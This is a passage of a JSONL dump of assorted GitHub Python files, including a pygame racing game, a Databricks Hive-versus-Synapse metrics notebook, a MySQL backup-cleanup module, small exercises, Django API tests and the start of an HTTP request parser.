player_group.draw(screen)\n \n # Vẽ các đối tượng, văn bản, hình ảnh cần thiết trên màn hình dừng\n font=pygame.font.Font(pygame.font.get_default_font(),15)\n font1=pygame.font.Font(pygame.font.get_default_font(),16) \n font2=pygame.font.Font(pygame.font.get_default_font(),20)\n pygame.draw.rect(screen,white,(0,40,width,130))\n text = font1.render('Press \"Space\" to play', True, white)\n text_rect = text.get_rect(center=(240,480))\n ###################################\n text_guide=font2.render(\"HOW TO PLAY\", True, black)\n text_guide_rect = text.get_rect(center=(250,60))\n ###################################\n text_guide1=font.render(\"Control the vehicle using the left and right keys on the keyboard.\", True, black)\n text_guide1_rect = text.get_rect(center=(100,90))\n ###################################\n text_guide2=font.render(\"Passing traffic cars will give you 1 point.\", True, black)\n text_guide2_rect = text.get_rect(center=(185,110))\n ###################################\n text_guide3=font.render(\"If score divisible by 10 the vehicle's speed will increase.\", True, black)\n text_guide3_rect = text.get_rect(center=(140,130))\n ###################################\n text_guide4=font.render(\"The game will end if there is a collision\", True, black)\n text_guide4_rect = text.get_rect(center=(185,150))\n ###################################\n screen.blit(text, text_rect)\n screen.blit(text_guide,text_guide_rect)\n screen.blit(text_guide1,text_guide1_rect)\n screen.blit(text_guide2,text_guide2_rect)\n screen.blit(text_guide3,text_guide3_rect)\n screen.blit(text_guide4,text_guide4_rect)\n\n\n # Cập nhật màn hình\n pygame.display.flip()\n \n # Chờ người chơi nhấn phím để bắt đầu trò chơi\n waiting = True\n while waiting:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n elif event.type == pygame.KEYDOWN:\n if event.key==K_SPACE:\n waiting = False\n\n# Hiển thị màn hình dừng trước khi bắt đầu trò chơi\nshow_start_screen()\n\n##Vòng lặp xử lý game\nrunning=True\nwhile running:\n #Chỉnh khung hình/s\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type==QUIT:\n running=False\n\n #Điều khiển xe\n if event.type==KEYDOWN:\n if event.key==K_LEFT and player.rect.center[0]>lane_left:\n player.rect.x -=100\n if event.key==K_RIGHT and player.rect.center[0]= street_height * 2:\n lane_move_Y=0\n for y in range(street_height * -2,height,street_height*2):\n pygame.draw.rect(screen,white,(lane_left + 45,y + lane_move_Y, street_width,street_height))\n pygame.draw.rect(screen,white,(lane_center + 45,y + lane_move_Y, street_width,street_height))\n\n #Vẽ xe người chơi\n player_group.draw(screen)\n\n #Vẽ xe công cộng chạy\n if len(vehicle_group) < 2:\n add_verhicle= True\n for verhicle in vehicle_group:\n if verhicle.rect.top < verhicle.rect.height * 1.5:\n add_verhicle = False\n if add_verhicle:\n lane=random.choice(lanes)\n image=random.choice(Vehicle_image)\n verhicle=Vehicle(image,lane,height/-2)\n vehicle_group.add(verhicle)\n\n #Cho xe công cộng chạy\n for vehicle in vehicle_group:\n vehicle.rect.y += speed\n\n #Xóa xe công cộng\n if vehicle.rect.top >= height:\n vehicle.kill()\n score +=1\n\n #Tăng tốc độ chạy\n if score > 0 and score % 10 == 0:\n speed += 1\n kmh += 10\n\n #Vẽ xe công cộng\n vehicle_group.draw(screen)\n\n #Hiển thị điểm\n font=pygame.font.Font(pygame.font.get_default_font(),16)\n text=font.render('Score: '+str(score),True,white)\n text_rect=text.get_rect()\n text_rect.center=(50,40)\n text_speed=font.render('Speed: '+str(kmh)+' Km/h',True,red)\n text_speed_rect=text.get_rect()\n text_speed_rect.center=(220,480)\n screen.blit(text,text_rect)\n screen.blit(text_speed,text_speed_rect)\n\n if gameover:\n screen.blit(crash,crash_rect)\n pygame.draw.rect(screen,red,(0,50,width,100))\n font=pygame.font.Font(pygame.font.get_default_font(),16)\n text=font.render('Game Over! Play again? (Y / N)',True,white)\n text_rect=text.get_rect()\n text_rect.center=(width/2,100)\n screen.blit(text,text_rect)\n\n pygame.display.update()\n \n while gameover:\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type==QUIT:\n gameover=False\n running=False\n if event.type==KEYDOWN:\n if event.key==K_y:\n #reset game\n show_start_screen()\n gameover=False\n score=0\n kmh=40\n speed=2\n vehicle_group.empty()\n player.rect.center=[player_x,player_y]\n mixer.music.load('music/BackgroundMusic.wav')\n mixer.music.play()\n elif event.key==K_n:\n #quit game\n gameover=False\n running=False\npygame.quit()","repo_name":"AnVinh2811/Game-Racing-Car","sub_path":"GameRacingCar.py","file_name":"GameRacingCar.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24428590287","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC This notebook will create advanced metrics for table Synapse and compare it with hive mertics\n# MAGIC * Prerequisties:\n# MAGIC * Hive metrics must be generated(using jupyter hub/Putty notebook)\n# MAGIC * After passing parameters & running till command 4:\n# MAGIC * Pass parameters in cmd 3, below are the samples:\n# MAGIC * Container : dev\n# MAGIC * DBSchema : kh_dev_published_src_cas_db\n# MAGIC * PrimaryKey : plan_cd (# primary key for that table)\n# MAGIC * TableName : plan_needs_mapping (name of the table)\n# MAGIC * upload the hive metrics file in the file location created in command 4 (container/Test_Validation/Advanced_Statistics//yyyMMdd/)\n# MAGIC * Once the above two are done run the entire notebook \n\n# COMMAND ----------\n\n# MAGIC %run ./02_Utilities\n\n# COMMAND ----------\n\n# DBTITLE 1,Pass the parameters value here\ndbutils.widgets.removeAll()\ndbutils.widgets.text(\"DBSchema\",\"\")\ndbutils.widgets.text(\"TableName\",\"\")\ndbutils.widgets.text(\"PrimaryKey\",\"\")\ndbutils.widgets.text(\"ContainerName\",\"\")\n\n\nDBSchema = dbutils.widgets.get(\"DBSchema\")\nTableName = dbutils.widgets.get(\"TableName\")\nPrimaryKey = dbutils.widgets.get(\"PrimaryKey\")\nContainerName = dbutils.widgets.get(\"ContainerName\")\n#DBSchema = 'curated'\n#TableName = 'persistency_eda_lapse_dim'\n#PrimaryKey = 'pol_num'\n#Container = 'dev'\n\n# COMMAND ----------\n\n# DBTITLE 1,Make destination directory before dropping Hive metrics file\ncontainer = ContainerName\nmount_container(container)\ntbl_db = DBSchema\ntbl_nm = TableName\nprim_key = PrimaryKey\nmnt_path = dbfs_mount_path+container\ndate_path = date.today().strftime('%Y%m%d') #yyyy/mm/dd\ndest_path=mnt_path+'/Test_Validation/Advanced_Statistics/'+tbl_db+'.'+tbl_nm+'/'+date_path\ndbutils.fs.mkdirs(dest_path)\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Synapse Dataframe\ntbl_name = tbl_db+'.'+tbl_nm\nsyn_df = synapse_table_df(tbl_name)\n\n# COMMAND ----------\n\ndisplay(syn_df)\n\n# COMMAND ----------\n\n# DBTITLE 1,Compute Synapse Metrics\n#All source metrices\nsyn_primary_key_df = check_primary_key(syn_df,prim_key, tbl_db, tbl_nm)\nsyn_cat_df,syn_num_df, syn_date_df = check_data_types(prim_key, tbl_db, tbl_nm, syn_df)\n\n# COMMAND ----------\n\n# DBTITLE 1,Save Synapse Metrics to ADLS \nsyn_primary_key_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_primary_key.csv',header=True)\nsyn_num_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_num.csv',header=True)\nsyn_cat_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_cat.csv',header=True)\nsyn_date_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_date.csv',header=True)\n\n# COMMAND ----------\n\n# DBTITLE 1,Fetch Hive Metrices\nsrc_primary_key_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_primary_key.csv').toPandas()\nsrc_cat_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_cat.csv').toPandas()\nsrc_num_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_num.csv').toPandas()\nsrc_date_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_date.csv').toPandas()\n\n# COMMAND ----------\n\n# DBTITLE 1,Merge Source Hive and Target Synapse metrices\n#schema_name\ttable_name\tmeasure\tcolumn_value\tfreq\nm_primary = src_primary_key_df.merge(syn_primary_key_df, on=['schema_name','table_name','measure'], how='left', suffixes=['', '_tgt'], indicator=True)\n#schema_name\ttable_name\tcolumn_name\tvariable\tvalue\nm_num = src_num_df.merge(syn_num_df,on=['schema_name','table_name','column_name','variable'],how='left', suffixes=['', '_tgt'], indicator=True)\nm_cat = src_cat_df.merge(syn_cat_df,on=[\"schema_name\",\"table_name\",\"column_name\",\"column_value\"],how='left', suffixes=['', '_tgt'], indicator=True)\nm_date = src_date_df.merge(syn_date_df,on=[\"schema_name\",\"table_name\",\"date_type\",\"column_name\",\"column_value\"],how='left', suffixes=['', '_tgt'], indicator=True)\n\n# COMMAND ----------\n\n# DBTITLE 1,Value Diff and Percentage Diff\nm_primary['value_diff'] = m_primary['freq'].sub(m_primary['freq_tgt'])\nm_primary['%diff'] = percentage_change(m_primary['freq'],m_primary['freq_tgt'])\nm_cat['value_diff'] = m_cat['freq'].sub(m_cat['freq_tgt'],axis=0)\nm_cat['%diff'] = percentage_change(m_cat['freq'],m_cat['freq_tgt'])\nm_num['value_tgt'] = m_num['value_tgt'].astype(float, errors = 'raise')\nm_num['value_diff'] = m_num['value'].sub(m_num['value_tgt'],axis=0)\nm_num['%diff'] = percentage_change(m_num['value'],m_num['value_tgt'])\nm_date['value_diff'] = m_date['freq'].sub(m_date['freq_tgt'],axis=0)\nm_date['%diff'] = percentage_change(m_date['freq'],m_date['freq_tgt'])\n\n# COMMAND ----------\n\n# DBTITLE 1,Compare Synapse vs Hive save to ADLS loaction\ndbutils.fs.mkdirs(dest_path+'/Diff/')\nm_primary.to_csv(\"/dbfs\"+dest_path+'/Diff/Primary_key_diff.csv',header=True)\nm_num.to_csv(\"/dbfs\"+dest_path+'/Diff/Numeric_col_diff.csv',header=True)\nm_cat.to_csv(\"/dbfs\"+dest_path+'/Diff/Cat_col_diff.csv',header=True)\nm_date.to_csv(\"/dbfs\"+dest_path+'/Diff/Date_col_diff.csv',header=True)\n","repo_name":"navneku/navneku","sub_path":"databricks/Test_Scripts/KH_Migration/TestScripts_(non_automated_version)/Databricks/03.2_Hive_vs_Synapse_Advanced_Statistics.py","file_name":"03.2_Hive_vs_Synapse_Advanced_Statistics.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18103127849","text":"nterms= int(input(\"How many terms ? \"))\r\n\r\nn1=0 ; n2=1\r\ncount=0\r\n\r\nif nterms<0:\r\n print(\"Enter positive value!\")\r\n\r\nelif nterms==0:\r\n print(n1)\r\n\r\nelif nterms==1:\r\n print(n2)\r\n\r\nelse:\r\n while count[0-9]{4,4})-backup-(?P
\\d{4}-\\d{1,2}-\\d{1,2}T\\d{1,2}-\\d{1,2}-\\d{1,2}-\\d{4,6})\"\n)\n\n\n@dataclass\nclass ClearTask(object):\n \"\"\"\n 清理任务对象\n \"\"\"\n\n path: Path\n\n @property\n def rename_at(self):\n \"\"\"根据目录名,计算出目录备份的时间点\"\"\"\n # 目录的后缀是 “2023-05-29T20-23-32-472128” 这个格式,也就是说它不是一个正确的时间日期格式\n # 如果我们要得到 datetime 对象,还要给它整一下才行\n match = backup_dir_re_pattern.search(str(self.path))\n dt_str = match.group(\"dt\")\n date_str, tm_str = dt_str.split(\"T\")\n hour, minte, seconde, ms = tm_str.split(\"-\")\n datetime_str = \"{} {}:{}:{}.{}\".format(date_str, hour, minte, seconde, ms)\n return datetime.fromisoformat(datetime_str)\n\n def is_expired(self, now=None):\n \"\"\"\n 检查 rename 文件是否已经过期了\n \"\"\"\n match = backup_dir_re_pattern.search(str(self.path))\n # 用传好格式构造 datetime 对象\n if match:\n now = datetime.now() if now is None else now\n delta = now - self.rename_at\n if (\n delta.total_seconds()\n >= dbm_agent_config.mysql_clear_instance_expire_time\n ):\n return True\n # 没有匹配到正则、或是没有超过 3 天\n return False\n\n def is_empty(self):\n return len(self.glob()) == 0\n\n def glob(self):\n \"\"\"\n 返回 path 目录下的所有文件和目录\n \"\"\"\n return glob.glob(\"{}/*\".format(self.path))\n\n def __post_init__(self):\n \"\"\"\n init 完成之后先检查一下,实例有没有过期,过期了的话就先把目录给它扫出来\n \"\"\"\n self.dirs = []\n self.files = []\n if self.is_expired():\n # 过期了就分别把目录、文件保存到 dirs 和 files 中去\n for item in self.glob():\n item = Path(item)\n if item.is_dir():\n self.dirs.append(item)\n else:\n self.files.append(item)\n\n\ndef scan_data_dir_gen_task():\n \"\"\"只扫描 binlog 目录和 data 目录;至于 backup 目录这个是交由备份子系统完成\n\n Returns:\n --------\n [ClearTask,ClearTask ...]\n \"\"\"\n logging.info(messages.FUN_STARTS.format(fname()))\n\n result = []\n target_dirs = [\n dbm_agent_config.mysql_datadir_parent,\n dbm_agent_config.mysql_binlogdir_parent,\n ]\n for path in target_dirs:\n # 处理一下路径的格式,让它可以满足 glob.glob 的要求\n if path.endswith(\"/\"):\n target = path + \"*\"\n else:\n target = path + \"/*\"\n\n logging.info(\"scan dir '{}' .\".format(target))\n\n # 逐个比较找到 ${port}-backup-xxx 格式的备份目录\n for instance_path in glob.glob(target):\n if backup_dir_re_pattern.search(instance_path):\n logging.info(\"find '{}' .\".format(instance_path))\n # 构造 ClearTask 对象\n task = ClearTask(instance_path)\n if task.is_expired():\n result.append(task)\n else:\n logging.info(\n \"instance '{}' backup not expired .\".format(instance_path)\n )\n\n logging.info(messages.FUN_ENDS.format(fname()))\n return result\n\n\ndef clear_instance(task: ClearTask = None):\n \"\"\"\n 根据 ClearTask 中指定的目录进行清理动作\n \"\"\"\n logging.info(messages.FUN_STARTS.format(fname()))\n logging.info(\n \"task.path = '{}' is_expire = '{}' \".format(task.path, task.is_expired())\n )\n\n # 先清理文件\n for path in task.files:\n logging.info(\"deal-with file '{}' \".format(path))\n # 准备清理\n while True:\n # 如果文件比较大,那么就一直 truncate 到 0 为止\n chunck = truncate_or_delete_file(path, 16 * 1024 * 1024)\n time.sleep(1)\n if chunck == 0:\n # chunck == 0 说明文件已经执行 remove 清理掉了\n logging.info(\"file '{}' removed \".format(path))\n break\n else:\n logging.info(\"file '{}' truncated \".format(path))\n\n # 清理子目录\n for sub in task.dirs:\n clear_instance(ClearTask(sub))\n\n # 如果当前目录下已经没有文件、子目录了 就清理掉当前目录\n if task.is_empty():\n logging.info(\n \"sub directorys not exists, rm current directory '{}' \".format(task.path)\n )\n shutil.rmtree(task.path)\n\n logging.info(messages.FUN_ENDS.format(fname()))\n\n\ndef pub_clear_task_thread():\n \"\"\"\n 生成后台清理任务的线程函数\n \"\"\"\n global keep_threads_running\n while keep_threads_running:\n try:\n logging.info(messages.FUN_STARTS.format(fname()))\n tasks = []\n with sudo():\n tasks = scan_data_dir_gen_task()\n for task in tasks:\n clear_tasks.append(task)\n logging.info(messages.FUN_ENDS.format(fname()))\n except Exception as err:\n logging.exception(err)\n\n # 扫过一次之后就 sleep 一下\n time.sleep(dbm_agent_config.mysql_scan_thread_sleep_time)\n\n\ndef sub_clear_task_thread():\n \"\"\"\n 从队列里取出任务并执行清理\n \"\"\"\n global keep_threads_running\n while keep_threads_running:\n try:\n logging.info(messages.FUN_STARTS.format(fname()))\n try:\n task = clear_tasks.pop()\n except IndexError as err:\n logging.info(\"task deque is empty .\")\n logging.info(messages.FUN_ENDS.format(fname()))\n # 对于队列中没有任务的情况下要 sleep 下\n time.sleep(dbm_agent_config.mysql_clear_empty_task_sleep_time)\n continue\n\n with sudo():\n clear_instance(task)\n logging.info(messages.FUN_ENDS.format(fname()))\n except Exception as err:\n logging.exception(err)\n\n\ndef start_clear_tasks():\n threads.submit(pub_clear_task_thread)\n time.sleep(3)\n threads.submit(sub_clear_task_thread)\n","repo_name":"Neeky/dbm-agent","sub_path":"dbma/components/mysql/backends/clears.py","file_name":"clears.py","file_ext":"py","file_size_in_byte":7758,"program_lang":"python","lang":"zh","doc_type":"code","stars":169,"dataset":"github-code","pt":"37"} +{"seq_id":"23400854260","text":"import math \nprint('For quadratic equation ax**2+bx+c=0, enter the coefficients')\na=int(input('Enter a:'))\nb=int(input('Enter b:'))\nc=int(input('Enter c:'))\nif a==0:\n print('Value of a should not be zero')\n print('\\n Aborting !!!!')\nelse:\n d=(b*b)-(4*a*c)\n if d>0:\n r1=(-b+math.sqrt(d))/(2*a)\n r2=(-b-math.sqrt(d))/(2*a)\n print('Roots are real and unequal')\n print('Root1=',r1,'Root2=',r2)\n elif d==0:\n r1=(-b)/(2*a)\n print('Roots are real and equal')\n print('Root=',r1)\n else:\n print('Roots are complex and imaginary')","repo_name":"Tridev4/Python-codes","sub_path":"quadratic_eqn.py","file_name":"quadratic_eqn.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37261789355","text":"from common import create_linked_list, print_linked_list\nfrom models.linked_list_node import LinkedListNode\n\nnode_id = 0\n\n\ndef sort_linked_list(first_node: LinkedListNode):\n current_node = first_node\n prev_current_node = None\n while current_node is not None:\n prev_compare_node = current_node\n compare_node = current_node.next\n while compare_node is not None:\n if compare_node.value < current_node.value:\n swap_nodes(prev_current_node, current_node, prev_compare_node)\n if current_node is first_node:\n first_node = compare_node\n temp = current_node\n current_node = compare_node\n compare_node = temp\n else:\n prev_compare_node = compare_node\n compare_node = compare_node.next\n prev_current_node = current_node\n current_node = current_node.next\n return first_node\n\n\ndef swap_nodes(before_left_node, left_node: LinkedListNode, before_right_node: LinkedListNode):\n right_node = before_right_node.next\n if before_left_node is not None:\n before_left_node.next = right_node\n before_right_node.next = left_node\n temp = left_node.next\n left_node.next = right_node.next\n right_node.next = temp\n\n\ndef remove_duplicates_from_unsorted(first_node):\n values = []\n current_node = first_node\n prev_node = None\n while current_node is not None:\n if current_node.value in values:\n prev_node.next = current_node.next\n else:\n values.append(current_node.value)\n prev_node = current_node\n current_node = current_node.next\n\n\ndef remove_duplicates_from_unsorted2(first_node):\n current_node = first_node\n while current_node.next is not None:\n compare_node = current_node\n while compare_node.next is not None:\n if compare_node.next.value == current_node.value:\n compare_node.next = compare_node.next.next\n compare_node = compare_node.next\n current_node = current_node.next\n return first_node\n\n\ndef remove_duplicates_from_sorted(first_node):\n current_node = first_node\n prev_node = None\n while current_node is not None:\n if prev_node is not None and prev_node.value == current_node.value:\n prev_node.next = current_node.next\n else:\n prev_node = current_node\n current_node = current_node.next\n\n\nif __name__ == '__main__':\n node_count = 20\n first_node = create_linked_list(node_count)\n print_linked_list('With duplicates unsorted:', first_node)\n print()\n\n remove_duplicates_from_unsorted2(first_node)\n print_linked_list('Duplicates removed unsorted:', first_node)\n print()\n\n first_node = create_linked_list(node_count)\n print_linked_list('With duplicates unsorted:', first_node)\n print()\n\n first_node = sort_linked_list(first_node)\n print_linked_list('With duplicates sorted (not working yet):', first_node)\n print()\n\n remove_duplicates_from_sorted(first_node)\n print_linked_list('Duplicates removed sorted:', first_node)\n print()\n","repo_name":"Lemao81/python_code_monkey","sub_path":"linked_list_duplicates.py","file_name":"linked_list_duplicates.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13516252894","text":"import datetime\nimport json\n\n# import unittest\nfrom django.http import HttpRequest\nfrom django.test import TestCase\n\nfrom retirement_api.views import (\n estimator,\n get_full_retirement_age,\n income_check,\n param_check,\n)\n\n\ntry:\n from django.urls import reverse\nexcept ImportError:\n from django.core.urlresolvers import reverse\n\n\ntoday = datetime.datetime.now().date()\n\nPARAMS = {\n \"dobmon\": 8,\n \"dobday\": 14,\n \"yob\": 1970,\n \"earnings\": 70000,\n \"lastYearEarn\": \"\", # possible use for unemployed or already retired\n \"lastEarn\": \"\", # possible use for unemployed or already retired\n \"retiremonth\": \"\", # leve blank to get triple calculation -- 62, 67 and 70\n \"retireyear\": \"\", # leve blank to get triple calculation -- 62, 67 and 70\n \"dollars\": 1, # benefits to be calculated in current-year dollars\n \"prgf\": 2,\n}\n\n\nclass ViewTests(TestCase):\n req_good = HttpRequest()\n req_good.GET[\"dob\"] = \"1955-05-05\"\n req_good.GET[\"income\"] = \"40000\"\n req_blank = HttpRequest()\n req_blank.GET[\"dob\"] = \"\"\n req_blank.GET[\"income\"] = \"\"\n req_invalid = HttpRequest()\n req_invalid.GET[\"dob\"] = \"1-2-%s\" % (today.year + 5)\n req_invalid.GET[\"income\"] = \"x\"\n return_keys = [\"data\", \"error\"]\n\n def test_base_view(self):\n url = reverse(\"retirement_api:claiming_en\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n url = reverse(\"retirement_api:claiming_es\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n\n def test_param_check(self):\n self.assertEqual(param_check(self.req_good, \"dob\"), \"1955-05-05\")\n self.assertEqual(param_check(self.req_good, \"income\"), \"40000\")\n self.assertEqual(param_check(self.req_blank, \"dob\"), None)\n self.assertEqual(param_check(self.req_blank, \"income\"), None)\n\n def test_income_check(self):\n self.assertEqual(income_check(\"544.30\"), 544)\n self.assertEqual(income_check(\"$55,000.15\"), 55000)\n self.assertEqual(income_check(\"0\"), 0)\n self.assertEqual(income_check(\"x\"), None)\n self.assertEqual(income_check(\"\"), None)\n\n def test_get_full_retirement_age(self):\n request = self.req_blank\n response = get_full_retirement_age(request, birth_year=\"1953\")\n self.assertTrue(json.loads(response.content) == [66, 0])\n response2 = get_full_retirement_age(request, birth_year=1957)\n self.assertTrue(json.loads(response2.content) == [66, 6])\n response3 = get_full_retirement_age(request, birth_year=1969)\n self.assertTrue(json.loads(response3.content) == [67, 0])\n response4 = get_full_retirement_age(request, birth_year=969)\n self.assertTrue(response4.status_code == 400)\n\n def test_estimator_url_data(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\", income=\"40000\")\n self.assertIsInstance(response.content, bytes)\n rdata = json.loads(response.content)\n for each in self.return_keys:\n self.assertTrue(each in rdata.keys())\n\n def test_estimator_url_data_bad_income(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\", income=\"z\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_url_data_bad_dob(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-xx\", income=\"4000\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data(self):\n request = self.req_good\n response = estimator(request)\n self.assertTrue(response.status_code == 200)\n self.assertIsInstance(response.content, bytes)\n rdata = json.loads(response.content)\n for each in self.return_keys:\n self.assertTrue(each in rdata.keys())\n\n def test_estimator_query_data_blank(self):\n request = self.req_blank\n response = estimator(request)\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_blank_dob(self):\n request = self.req_blank\n response = estimator(request, income=\"40000\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_blank_income(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_bad_income(self):\n request = self.req_invalid\n response = estimator(request, dob=\"1955-05-05\")\n self.assertTrue(response.status_code == 400)\n\n def test_about_pages(self):\n url = reverse(\"retirement_api:retirement_about_en\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n url = reverse(\"retirement_api:retirement_about_es\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/retirement_api/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"25708653620","text":"'''\n\nMove the code you previously wrote to calculate how many seconds are in a year into this file.\nThen execute it as a script to see the output printed to your console.\n\n'''\ndays = 365.25\nhours_in_a_day = 24\nminutes_in_an_hour = 60\nsecond_in_a_minute = 60\nseconds_in_a_year = (days * hours_in_a_day * minutes_in_an_hour * second_in_a_minute)\nx = \"There are\"\ny = \"seconds in a year.\"\nz = seconds_in_a_year\nprint (x,z,y)","repo_name":"igorlongoria/python-fundamentals","sub_path":"01_python_fundamentals/01_02_seconds_years.py","file_name":"01_02_seconds_years.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73754182186","text":"#!/usr/bin/env python\n\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\ndef new_points(range, x_array, y_array):\n new_x_array = []\n new_y_array = []\n for j in x_array: \n error_x = random.randint(-2,-2)\n new_x = j + error_x\n new_x_array.append(new_x)\n \n error_y = random.randint(-2,2)\n new_y = y_array[x_array.index(j)] + error_y \n new_y_array.append(new_y)\n \n return new_x_array, new_y_array\n\n\n\n \n \n","repo_name":"mahajabinrahman/quantum_mixture","sub_path":"noise_generator.py","file_name":"noise_generator.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2365812937","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# COMP90055 Computing Project\n# Supervisor: Prof. Richard Sinnott\n# 874204 Liangmu ZHU\n# @ Master of Information Technology\n# Contact: liangmuz@student.unimelb.edu.au\n\nimport os, sys\nfrom PyQt4.QtGui import *\nfilename = \"test_photos/9929959995_6e31b94d8b_o.jpg\"\n# Create an PyQT4 application object.\napp = QApplication(sys.argv)\n\n# The QWidget widget is the base class of all user interface objects in PyQt4.\nwindow = QWidget()\n\n# Set window size.\nwindow.resize(480, 320)\n\n# Set window title\nwindow.setWindowTitle(\"Melbourne Landmark Identification\")\n\n# Get filename using QFileDialog\ndef browse():\n #global filename\n # print file contents\n # with open(filename, 'r') as file:\n\n label1 = QLabel(window)\n filename = QFileDialog.getOpenFileName(window, 'Open File', '/')\n pixmap = QPixmap(filename)\n label1.setPixmap(pixmap)\n window.resize(pixmap.width() + 150, pixmap.height() + 100)\n vbox = QVBoxLayout(window)\n vbox.addWidget(label1)\n buttonCommand = \"python -m scripts.label_image --graph tf_files/retrained_graph.pb --image \" + str(filename)\n os.system(buttonCommand)\n\ndef calculate():\n #global filename\n\n recordtext = open('record.txt','r')\n finaltext = recordtext.readlines()[1].upper()\n QMessageBox.about(window, \"Landmark similarity\", finaltext)\n\n# Add buttons\nbutton1 = QPushButton('Select a photo!', window)\n\nbutton1.clicked.connect(browse)\nbutton1.resize(button1.sizeHint())\nbutton1.move(10, 10)\n\nbutton2 = QPushButton('Which landmark?', window)\n\nbutton2.clicked.connect(calculate)\nbutton2.resize(button2.sizeHint())\nbutton2.move(210, 10)\n\n# Show window\nwindow.show()\n\nsys.exit(app.exec_())\n","repo_name":"nilaoyezhu/Melbourne_Landmark_Identification","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70198929069","text":"import pytest\nfrom aqueduct_executor.operators.connectors.data import dataframe, postgres\nfrom aqueduct_executor.operators.connectors.tests import conf, utils\n\n_TABLE = \"test_postgres\"\n\n\n@pytest.mark.skipif(conf.SKIP_POSTGRES, reason=\"Skip Postgres Flag Set\")\nclass TestPostgres:\n @classmethod\n def setup_class(cls):\n # Setup connector\n config = conf.POSTGRES_CONF\n conn = postgres.PostgresConnector(config)\n cls.conn = conn\n\n # Setup test dataframe\n cls.test_df = utils.sample_df()\n\n @classmethod\n def teardown_class(cls):\n cls.conn.engine.connect().execute(\"DROP TABLE IF EXISTS {} CASCADE;\".format(_TABLE))\n\n def test_authenticate(self):\n utils.authenticate_test(self.conn)\n\n @pytest.mark.dependency()\n def test_load(self):\n params = {dataframe.LOAD_PARAMS_TABLE_KEY: _TABLE}\n utils.load_test(self.conn, params, self.test_df)\n\n @pytest.mark.dependency(depends=[\"TestPostgres::test_load\"])\n def test_extract(self):\n params = {dataframe.EXTRACT_PARAMS_QUERY_KEY: \"SELECT * FROM {};\".format(_TABLE)}\n utils.extract_test(self.conn, params, expected_df=self.test_df)\n","repo_name":"aqueducthq/aqueduct","sub_path":"src/python/aqueduct_executor/operators/connectors/tests/test_postgres.py","file_name":"test_postgres.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"37"} +{"seq_id":"13782955634","text":"from urlparse import urlparse\n\nclass HTTPRequest(object):\n host = None\n url = None\n version = None\n port = None\n scheme = None\n method = None\n path = None\n headers = []\n body = None\n\n def __init__(self):\n raise NotImplemented(\"interface description\")\n\nclass HTTPResponse(object):\n version = None\n status = None\n reason = None\n headers = []\n body = None\n\n def __init__(self):\n raise NotImplemented(\"Base Implementation\")\n\n def get_header(self,header,caseinsensitive=True):\n raise NotImplemented(\"Base Implementation\")\n\nclass RawHTTPRequest(HTTPRequest):\n def __init__(self,data):\n pos = self.readStatusLine(data,0)\n pos = self.readHeaders(data,pos)\n content_length = filter(lambda x: x[0].lower() == \"content-length\", self.headers)\n if len(content_length) == 1:\n length = int(content_length[0][1])\n self.body = data[pos:pos+length]\n pos = pos+length\n if len(content_length) > 1:\n raise ValueError(\"Too many content-length headers!\")\n\n self.remainder = data[pos:]\n\n def __str__(self):\n buf = \"%s %s HTTP/%s\\r\\n\" % (self.method,self.path,self.version)\n for k,v in self.headers:\n if self.body is not None and self.body != \"\":\n buf += \"%s: %s\\r\\n\" % (k,v) \n buf += \"\\r\\n\"\n buf += self.body\n return buf\n\n version = None\n port = 80\n scheme = 